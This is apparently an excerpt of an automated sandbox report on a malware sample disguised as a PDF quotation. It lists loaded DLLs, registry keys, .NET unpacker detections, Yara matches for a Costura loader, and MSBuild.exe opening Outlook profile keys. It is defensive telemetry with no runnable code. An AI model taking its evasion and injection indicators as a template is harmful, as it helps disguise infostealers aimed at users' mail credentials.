Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\timeout.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\timeout.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.00000137380C8000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2347202995.0000013750D40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.00000137380C8000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2347202995.0000013750D40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D33000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2343226980.0000013750490000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747B81000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D33000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2343226980.0000013750490000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747B81000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, -.cs	.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747ce3710.5.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747ce3710.5.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747ce3710.5.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747ce3710.5.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747ce3710.5.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13750d40000.13.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13750d40000.13.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13750d40000.13.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13750490000.9.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13750490000.9.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13750490000.9.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13750490000.9.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13750490000.9.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747daade0.7.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747daade0.7.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747daade0.7.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties

Yara detected Costura Assembly Loader

Source: Yara match	File source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13750ce0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747c5c0a0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2346839728.0000013750CE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2339758590.0000013747B81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2333864678.0000013737C7F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe PID: 7404, type: MEMORYSTR

Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Code function: 0_2_00007FFD9B877F2D push E95E5346h; ret	0_2_00007FFD9B877F49
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Code function: 0_2_00007FFD9BC1B3FF push eax; iretd	0_2_00007FFD9BC1B431
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Code function: 0_2_00007FFD9BC1756B push ebx; iretd	0_2_00007FFD9BC1756A
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Code function: 0_2_00007FFD9BC1752B push ebx; iretd	0_2_00007FFD9BC1756A
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Code function: 0_2_00007FFD9BC07548 push ebx; iretd	0_2_00007FFD9BC0756A
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Code function: 10_2_00007FFD9B880D28 push es; ret	10_2_00007FFD9B880D27
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Code function: 10_2_00007FFD9B889901 push cs; retf	10_2_00007FFD9B889905
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Code function: 10_2_00007FFD9B880C90 push edx; ret	10_2_00007FFD9B880CDB
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Code function: 10_2_00007FFD9B880CDC push es; ret	10_2_00007FFD9B880D27

Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
